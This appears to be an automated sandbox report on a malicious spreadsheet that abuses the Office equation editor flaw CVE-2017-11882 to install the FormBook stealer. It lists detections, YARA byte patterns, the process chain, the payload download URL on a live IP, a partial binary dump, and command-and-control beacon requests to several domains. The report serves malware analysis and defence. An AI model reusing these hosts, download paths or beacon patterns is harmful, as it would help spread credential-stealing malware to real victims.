
Analysis Report: Order List.xlsx

Overview

General Information

Sample Name: Order List.xlsx
Analysis ID: 321137
MD5: b86395637ffd2f1a85acfe7a2f43f8d6
SHA1: f378cb75a5b73b995c78bb0a779488059cc44c44
SHA256: 36a4989dba737cef8d0067e2b7a06ad29e5ec9ea96bdb7d3e41cf08af37c8553
Tags: VelvetSweatshop, xlsx


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2516 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2360 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2880 cmdline: 'C:\Users\Public\vbc.exe' MD5: BF75ED61E1B1F7B310EC1D999077C4DD)
      • RegAsm.exe (PID: 2464 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • rundll32.exe (PID: 2440 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • cmd.exe (PID: 1616 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16679:$sqlite3step: 68 34 1C 7B E1
  • 0x1678c:$sqlite3step: 68 34 1C 7B E1
  • 0x166a8:$sqlite3text: 68 38 2A 90 C5
  • 0x167cd:$sqlite3text: 68 38 2A 90 C5
  • 0x166bb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(25 further memory-dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.vbc.exe.49e0000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.vbc.exe.49e0000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.vbc.exe.49e0000.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16679:$sqlite3step: 68 34 1C 7B E1
  • 0x1678c:$sqlite3step: 68 34 1C 7B E1
  • 0x166a8:$sqlite3text: 68 38 2A 90 C5
  • 0x167cd:$sqlite3text: 68 38 2A 90 C5
  • 0x166bb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
4.2.vbc.exe.49e0000.3.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.vbc.exe.49e0000.3.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13855:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13341:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13957:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13acf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x856a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x92e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18947:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(7 further unpacked-PE entries not shown)

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2360, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2880
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 198.23.212.188, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2360, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2360, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Sigma detected: Executables Started in Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2360, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2880
Sigma detected: Execution in Non-Executable Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2360, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2880
Sigma detected: Suspicious Program Location Process Starts
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2360, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2880

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://198.23.212.188/reg/vbc.exe; Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; ReversingLabs: Detection: 27%
Source: C:\Users\Public\vbc.exe; ReversingLabs: Detection: 27%
Multi AV Scanner detection for submitted file
Source: Order List.xlsx; ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match; File source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; Joe Sandbox ML: detected
Source: 4.2.vbc.exe.49e0000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.RegAsm.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 4x nop then pop ebx
Source: global traffic; DNS query: name: www.nanox.ltd
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 198.23.212.188:80
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 198.23.212.188:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49167
Source: Traffic; Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49172
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Fri, 20 Nov 2020 11:05:19 GMT
  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11
  Last-Modified: Fri, 20 Nov 2020 08:11:07 GMT
  ETag: "87000-5b48562f86225"
  Accept-Ranges: bytes
  Content-Length: 552960
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 57 74 b7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 68 08 00 00 06 00 00 00 00 00 00 8e 86 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 70 e7 08 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 86 08 00 4b 00 00 00 00 a0 08 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 66 08 00 00 20 00 00 00 68 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 a0 08 00 00 04 00 00 00 6a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 86 08 00 00 00 00 00 48 00 00 00 02 00 05 00 70 e6 07 00 d0 9f 00 00 03 00 00 00 10 00 
00 06 f0 71 00 00 80 74 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 25 00 00 70 80 04 00 00 0
Source: global traffic; HTTP traffic detected: GET /o56q/?mL0=FKXiaoKe3bemDRIUugzxxbPTRBaZLZeqFtxjN0B1OdNP6J3XvAf3eeDn7VbbZMxcUak0EA==&sFNp=jpX0Lfi0J HTTP/1.1
  Host: www.alloutdoorspeaker.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=kNK7qyUu0ssORWb2BQjm/XfEOCgL/rCBvS1q+B2CMQED5QxzM1Z/xIceLMT4/tikHS2Lng== HTTP/1.1
  Host: www.teelinkz.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=txyYMtCM76zgLKXk1qYYn+5SCVWoTymC4Fy9/8gvc5WTXTsch9hYV+sG2t1iNylweztP4w== HTTP/1.1
  Host: www.natcandy.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected: GET /o56q/?mL0=pV6faFGE09Anucwtu1kKnRp8occyZHoCKwW13VBtOuBMFJZe4NXXYoNYm7yc9vXPVF34hw==&sFNp=jpX0Lfi0J HTTP/1.1
  Host: www.californiapropiedades.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=B+oguf8ZoLV3WGdfJzBRzAgDmcX+4hJ8FJ+I0/mWlmQn56ZLUkNDQwA/Y9AdAB6o/3r8rA== HTTP/1.1
  Host: www.pornfilm3d.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected: GET /o56q/?mL0=Lg4DNBfwCTdoZLnXKvmswQE2HeXzej7VDwiGjOCQv6fEN8TXR+UTrTnc2v5FsvAKWI4bvw==&sFNp=jpX0Lfi0J HTTP/1.1
  Host: www.the-trinity-project.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=9OrW47TrMTZH15Vmzbe9TQM6sSr1xjl4p0LLri3wKcTyHbeStzlrAaSeWLbT0hv9vCeuEg== HTTP/1.1
  Host: www.crimson.school
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View; IP Address: 34.102.136.180
Source: Joe Sandbox View; IP Address: 198.54.117.216
Source: Joe Sandbox View; ASN Name: LIQUIDWEBUS
Source: Joe Sandbox View; ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View; ASN Name: GOOGLEUS
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: global traffic; HTTP traffic detected: GET /reg/vbc.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 198.23.212.188
  Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 198.23.212.188 (this event is listed 50 times in the report)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\64EDB67F.emf
Source: global traffic; HTTP traffic detected: GET /reg/vbc.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 198.23.212.188
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /o56q/?mL0=FKXiaoKe3bemDRIUugzxxbPTRBaZLZeqFtxjN0B1OdNP6J3XvAf3eeDn7VbbZMxcUak0EA==&sFNp=jpX0Lfi0J HTTP/1.1
  Host: www.alloutdoorspeaker.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=kNK7qyUu0ssORWb2BQjm/XfEOCgL/rCBvS1q+B2CMQED5QxzM1Z/xIceLMT4/tikHS2Lng== HTTP/1.1
  Host: www.teelinkz.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=txyYMtCM76zgLKXk1qYYn+5SCVWoTymC4Fy9/8gvc5WTXTsch9hYV+sG2t1iNylweztP4w== HTTP/1.1
  Host: www.natcandy.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected: GET /o56q/?mL0=pV6faFGE09Anucwtu1kKnRp8occyZHoCKwW13VBtOuBMFJZe4NXXYoNYm7yc9vXPVF34hw==&sFNp=jpX0Lfi0J HTTP/1.1
  Host: www.californiapropiedades.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=B+oguf8ZoLV3WGdfJzBRzAgDmcX+4hJ8FJ+I0/mWlmQn56ZLUkNDQwA/Y9AdAB6o/3r8rA== HTTP/1.1
  Host: www.pornfilm3d.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected: GET /o56q/?mL0=Lg4DNBfwCTdoZLnXKvmswQE2HeXzej7VDwiGjOCQv6fEN8TXR+UTrTnc2v5FsvAKWI4bvw==&sFNp=jpX0Lfi0J HTTP/1.1
  Host: www.the-trinity-project.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=9OrW47TrMTZH15Vmzbe9TQM6sSr1xjl4p0LLri3wKcTyHbeStzlrAaSeWLbT0hv9vCeuEg== HTTP/1.1
  Host: www.crimson.school
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2144980691.0000000003C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown; DNS traffic detected: queries for: www.nanox.ltd
Source: explorer.exe, 00000006.00000000.2159393395.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2159393395.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://br.search.yahoo.com/
